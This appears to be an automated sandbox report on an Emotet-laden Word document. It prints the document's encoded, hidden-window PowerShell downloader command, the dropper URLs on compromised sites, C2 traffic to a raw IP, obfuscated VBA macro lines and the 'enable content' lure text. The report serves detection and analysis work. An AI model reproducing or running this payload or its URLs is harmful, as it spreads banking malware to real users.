Author: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://veterinariadrpopui.com	Avira URL Cloud: Label: malware
Source: http://veterinariadrpopui.com/content/5f18Q/	Avira URL Cloud: Label: malware
Source: http://sofsuite.com/wp-includes/2jm3nIk/	Avira URL Cloud: Label: phishing
Source: http://khanhhoahomnay.net/wordpress/CGMC/	Avira URL Cloud: Label: malware
Source: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/	Avira URL Cloud: Label: malware
Source: http://wpsapk.com/wp-admin/v/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: veterinariadrpopui.com	Virustotal: Detection: 7%			Perma Link
Source: khanhhoahomnay.net	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: MAIL-0573188.doc	Virustotal: Detection: 66%			Perma Link
Source: MAIL-0573188.doc	Metadefender: Detection: 47%			Perma Link

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,	7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,	7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,	7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F75AE CryptDecodeObjectEx,	13_2_001F75AE

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F109C FindFirstFileW,

13_2_001F109C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: wpsapk.com

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 45.130.229.91:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.141.14:80

Networking:

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View	IP Address: 45.130.229.91 45.130.229.91

Source: Joe Sandbox View	ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-HOSTINGERLT AS-HOSTINGERLT

Source: global traffic

HTTP traffic detected: POST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1DNT: 0Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWzUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 8068Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown	TCP traffic detected without corresponding DNS query: 5.2.136.90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_0020023A InternetReadFile,

13_2_0020023A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/n/ HTTP/1.1Host: shop.elemenslide.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: wpsapk.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: http://beatlemail.net/picture.php?blogid=0
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2109649059.000000001B86F000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaneH)
Source: powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	String found in binary or memory: https://shop.elemenslide.comp
Source: powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K O a S
Source: Screenshot number: 8	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K O a S
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: MAIL-0573188.doc	OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: MAIL-0573188.doc	OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
